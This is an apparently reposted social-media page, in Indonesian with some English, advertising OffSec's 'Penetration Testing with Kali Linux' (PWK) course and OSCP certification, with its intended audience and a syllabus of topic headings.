Pengujian Penetrasi dengan Kali Linux adalah kursus dasar di Keamanan Ofensif. Mereka yang baru menggunakan OffSec atau pengujian penetrasi harus mulai dari sini.

Kursus peretasan etika online ini berjalan sendiri. Ini memperkenalkan alat dan teknik pengujian penetrasi melalui pengalaman langsung. PWK tidak hanya melatih keterampilan, tetapi juga pola pikir yang dibutuhkan untuk menjadi penguji penetrasi yang sukses.

Siswa yang menyelesaikan kursus dan lulus ujian mendapatkan sertifikasi OSCP (Offensive Security Certified Professional) yang didambakan.

📜 FUNGSIONAL KURSUS

Kursus ini dirancang untuk para profesional keamanan informasi yang ingin mengambil langkah serius dan bermakna ke dunia pengujian penetrasi profesional. Ini termasuk:

👉 Pentester mencari sertifikasi industri terkemuka
👉 Profesional keamanan
👉 Administrator jaringan
👉 Profesional teknologi lainnya

📜 IKHTISAR KURSUS & SILABUS

PWK adalah kursus unik yang menggabungkan materi kursus tradisional dengan simulasi langsung, menggunakan lingkungan lab virtual. Kursus ini mencakup topik-topik berikut secara rinci:

• Pengumpulan Informasi Pasif
• Pengumpulan Informasi Aktif
• Pemindaian Kerentanan
• Buffer Overflows
• Eksploitasi Overflow Buffer Win32
• Linux Buffer Overflow Exploitation
• Bekerja dengan Eksploitasi
• Transfer File
• Eskalasi Privilege
• Serangan Sisi Klien
• Serangan Aplikasi Web
• Serangan Kata Sandi
• Redirection dan Tunneling Port
• Kerangka Metasploit
• Memotong Perangkat Lunak Antivirus
• Merakit Potongan: Pe*******on Test Breakdown

https://www.offensive-security.com/pwk-oscp/

Pe*******on Testing with Kali Linux is OffSec's foundational ethical hacking course. Start here and earn your OSCP certification. Live training available.

Address

Jalan Danau Seriang Sawojajar
Malang
65139

Alerts

Be the first to know and let us send you an email when Wlingi-Blitar Hacker Pages posts news and promotions. Your email address will not be used for any other purpose, and you can unsubscribe at any time.

Videos

Share


Other Social Media Agencies in Malang

Show All

You may also like